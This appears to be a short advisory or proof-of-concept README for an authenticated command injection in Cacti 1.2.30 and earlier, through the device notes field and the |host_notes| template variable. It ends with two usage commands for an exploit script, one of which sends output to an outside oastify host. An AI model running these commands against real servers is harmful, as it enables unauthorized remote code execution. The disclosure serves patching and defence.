
Cacti ≤ 1.2.30 Auth RCE - Host variable injection
An OS command injection vulnerability in Cacti ≤ 1.2.30 allows any authenticated user with device and graph template creation privileges to execute arbitrary commands on the underlying server. The flaw exists because user-controlled host metadata fields (specifically the device notes field) are substituted into RRDtool command-line arguments via Cacti’s variable replacement engine without any sanitization or escaping. An attacker can inject shell metacharacters into the notes field, craft a graph template that references the |host_notes| variable, and trigger graph rendering to achieve full remote code execution as the web server user.
python3 cacti_rce_poc.py --url http://target/cacti --user admin --pass admin --cmd 'id'
OOB command execution:
python3 cacti_rce_poc.py --url http://target/cacti --user admin --pass admin --oob your.oastify.com
